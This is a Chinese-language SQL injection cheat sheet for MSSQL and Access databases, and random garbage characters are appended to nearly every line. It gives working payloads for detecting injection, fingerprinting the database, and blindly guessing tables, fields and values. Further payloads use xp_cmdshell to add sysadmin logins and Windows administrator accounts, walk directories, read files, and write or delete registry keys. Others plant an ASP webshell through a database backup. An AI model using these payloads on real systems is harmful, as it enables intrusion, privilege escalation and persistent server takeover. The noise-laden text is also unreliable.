1.判断是否有注入;and 1=1 ;and 1=2 )Y�
*?VqZn
2.初步判断是否是mssql ;and user>0 )7i?8XiSZF
I�YCKF�/2o
3.注入参数是字符'and [查询条件] and ''=' -I_lCZ{Nbi
��,-b{oS~u
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 2bxT%xH:�g
xwRnrW�d^6
5.判断数据库系统 A|�>��C�3S
q9�0S>�c�,
;and (select count(*) from sysobjects)>0 mssql ��NI^��Y%N
lM�m�-K%(2
;and (select count(*) from msysobjects)>0 access yZ!Eu�#81�
)$]+�R�?v�
}���� 1XLe
�%~�W}262
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �?&�GM�p[�
hr{%'D�A�S
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �-91l"�sI
�{X�� �=\
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 l�.34��h�
�.e"��jnP~
9.(1)猜字段的ascii值(access) �Z?X$�8o^Z
x!�$,Hcph,
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 [�y�{�a�g{
Bs1-U�I}+�
(2)猜字段的ascii值(mssql) =)zq�%d?i;
/� �P:Hfq�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 0}^-, ��Q,
DS$ _"'g%i
10.测试权限结构(mssql) "w'Y�ZO�]>
��"yz\p,��
R�OjjN W`W
:>���;ps�R
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 4���v�X�]c
g-:)�}�8d6
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �kK1�qFe?]
Ffxk] o&%c
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �qIqk�@u��
Y(���:OfC?
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- pS<b�|wu?f
$3[c�BX.=�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- #y*�=UV|�h
�K��?;��p:
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �'0O[�d��N
�eB\�r/B]�
;and 1=(select IS_MEMBER('db_owner'));-- t�Z��@�+18
z1�Fb�W�&V
D}061�~zb$
eFnsf�}(Iy
11.添加mssql和系统的帐户 n% `��r��
��={b
]��
;exec master.dbo.sp_addlogin username;-- ,|#>X>^FQQ
;exec master.dbo.sp_password null,username,password;-- 2 �Lam��vf
&S3W/l�Qs�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- |O)�deiJRy
%'t~e?�d�!
;exec master.dbo.xp_cmdshell 'net user username password �XF7�W�'�^
:HE]P)wz-�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- `��;�_t�t_
�t@u\ 4b�v
;exec master.dbo.xp_cmdshell 'net user username password /add';-- cV{ZD��q��
�y{{EC#��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- n>�E*g�|�a
eb��/V}�%
�fD~!t �8J
@1@q6@�9Tu
12.(1)遍历目录 �0`P]�fL+&
a`-hLX)�~Z
;create table dirs(paths varchar(100), id int) ];I|�_fXo%
�1SFKP$�^�
;insert dirs exec master.dbo.xp_dirtree 'c:\' �I���j�#a
1��:Yt2�]�
;and (select top 1 paths from dirs)>0 y�\_S1�1{v
N#u8{\�|8]
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) l�'W��+^��
��#c^Q<&B�
�
[;�=WnG�
�0�`!�Q-G7
(2)遍历目录 ��b�aNfS�
E�~>�6*_�?
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- U�TTC:�=F+
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 FqTkUWd,#
jO�b[h=B�"
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 nP�3GI:mjL
�]h�j1.V+�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �@:7g�HRJ!
?&"�^�\�p
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 }��x.)��gW
aVP|:��OAj
q`aY.�dD=O
y@M}T{,��/
13.mssql中的存储过程 nF'xV44�"�
>-w=7,?'?z
xp_regenumvalues 注册表根键, 子键 mei_aN�7zW
RG�O�:p]t|
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 A�&P1M6O�f
|nE�V�Oy>'
xp_regread 根键,子键,键值名 s�\��W����
e9W7k�e E*
;exec xp_regread ��`
(D4gPW
'%�E�Zoc/U
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 |m�k}@OEf�
LO]6��Xd"
xp_regwrite 根键,子键, 值名, 值类型, 值 ]��|N4 #�4
��j�#e.rNG
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 #eC;3Kq#-
�~RXpz-Ye�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �'Y[A'.*}4
��p?�?/r��
xp_regdeletevalue 根键,子键,值名 �B/=q_.1F>
x~;EH6$5'/
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 :Nz?<3R0\�
RW�7oL:$dt
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 yb�{Q�,�Dz
qd+[ShrhqZ
}IN_5o(�(�
>J}n@���MZ
14.mssql的backup创建webshell 5!ubY
6P�h
z�w�:�C*sY
use model z"K(
�bw�6
b%;59^4AjD
create table cmd(str image); �JYd7@Msfc
�b��;L>%;�
insert into cmd(str) values (''); v1r�_Z�(�$
���)_v\�{N
backup database model to disk='c:\l.asp'; s$Zq/l$1x
*e<Eu>fW#&
fc�ICFReyV
5$oewj�LO�
15.mssql内置函数 ��.H^�P2tp
�`.'i V[fr
;and (select @@version)>0 获得Windows的版本号 +SQ�jX7]�%
kV ,G��,wo
;and user_name()='dbo' 判断当前系统的连接用户是不是sa oM<!I0"gC+
�A*�;��?U2
;and (select user_name())>0 爆当前系统的连接用户 c�Vay=�5].
-@L'�s{J{M
;and (select db_name())>0 得到当前连接的数据库 ?�Hi�}nsw�
sc8DY!|OYN
�Mjj}E
>�&
`x}
Dk<HF�
16.简洁的webshell 3}4p_}f/[4
=#(0)p�$EC
use model �i7��nL_N
Px?Ao0)Z,�
create table cmd(str image); 'qV3O+@M�F
H�m��ExfW
insert into cmd(str) values (''); &|N�%#pY�S
vWl�[�l
-E
backup database model to disk='g:\wwwtest\l.asp';
